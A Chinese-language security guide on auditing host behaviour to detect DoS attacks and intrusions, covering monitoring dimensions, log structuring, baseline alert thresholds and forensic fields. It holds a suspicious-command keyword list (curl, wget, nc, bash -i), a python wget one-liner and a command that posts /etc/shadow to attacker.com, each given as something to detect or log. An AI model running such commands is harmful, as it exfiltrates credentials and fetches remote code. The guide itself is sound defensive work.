系统异常行为审计需主动构建攻击可见性防线,聚焦DoS与入侵共性行为,覆盖网络连接暴增、进程异常、权限变动、文件突变四维度,通过日志结构化、动态基线建模及完整溯源留痕实现精准检测与回溯。

系统异常行为审计不是被动记录,而是主动构建攻击可见性防线。面对拒绝服务(DoS/DDoS)和隐蔽入侵两类高发威胁,审计配置必须兼顾实时感知、行为基线建模与可回溯取证能力。核心不在于日志“有没有”,而在于关键行为是否被结构化捕获、是否能跨日志源还原攻击链。
聚焦关键行为:DoS与入侵共性审计点
拒绝服务攻击常伴随资源耗尽、连接异常激增;入侵行为则体现为权限异常提升、非授权进程创建、敏感文件修改。二者在主机层有重叠痕迹,审计应优先覆盖以下行为维度:
- 网络连接暴增:监控每秒新建TCP连接数、ESTABLISHED连接总数、异常端口(如高频连接非常用端口8080/3389)
- 进程异常行为:记录所有新进程启动(含父进程ID)、命令行参数(尤其含curl/wget/nc/bash -i等可疑字符串)、无签名二进制执行
- 账户与权限变动:记录sudo提权、su切换、用户组变更(如加入wheel/administrators)、新增/禁用账户
- 文件系统突变:监控/var/log、/tmp、/dev/shm等敏感路径的文件创建/修改,特别是.sh、.py、.so、.dll后缀及隐藏文件(以.开头)
日志采集与结构化处理
原始日志文本难以支撑自动化分析,必须完成标准化解析:
- Linux系统使用rsyslog或journald统一转发,将/var/log/secure(认证日志)、/var/log/messages(系统事件)、/var/log/audit/audit.log(审计子系统)三类日志接入集中平台
- 用Logstash或Fluentd的grok插件提取字段:如从"Accepted password for root from 203.123.45.67"中分离出user=root, src_ip=203.123.45.67, action=login_success
- Windows系统启用高级审核策略,重点开启“登录事件”“对象访问”“进程创建”“特权使用”,通过Windows Event Forwarding(WEF)汇聚至SIEM
基于行为基线的异常检测配置
静态规则易误报漏报,需结合动态基线识别偏离:
- 为每个主机建立CPU/内存/网络连接数的小时级基线,当某台服务器连接数突增至均值5倍以上且持续超10分钟,触发DoS预警
- 对SSH登录行为建模:统计各IP每日登录失败次数,单IP 1小时内失败≥10次即标记为暴力破解;同一用户从不同地理位置IP短时登录(如北京→纽约→新加坡),触发越权登录告警
- 进程行为画像:记录合法业务进程的典型命令行参数白名单,当/usr/bin/python3突然执行-c "import os;os.system('wget http://...')",立即告警并阻断
入侵溯源必备的审计留痕项
一次有效溯源依赖完整证据链,以下字段必须保留且不可篡改:
- 精确时间戳:纳秒级精度,避免因系统时钟漂移导致事件顺序错乱
- 进程全路径与哈希:不仅记录/tmp/.x,还需采集SHA256哈希值,便于比对已知恶意样本库
- 完整命令行参数:禁用截断,确保curl -X POST -d @/etc/shadow http://attacker.com完整可见
- 网络五元组:源IP、目的IP、源端口、目的端口、协议,配合conntrack日志还原会话全貌

















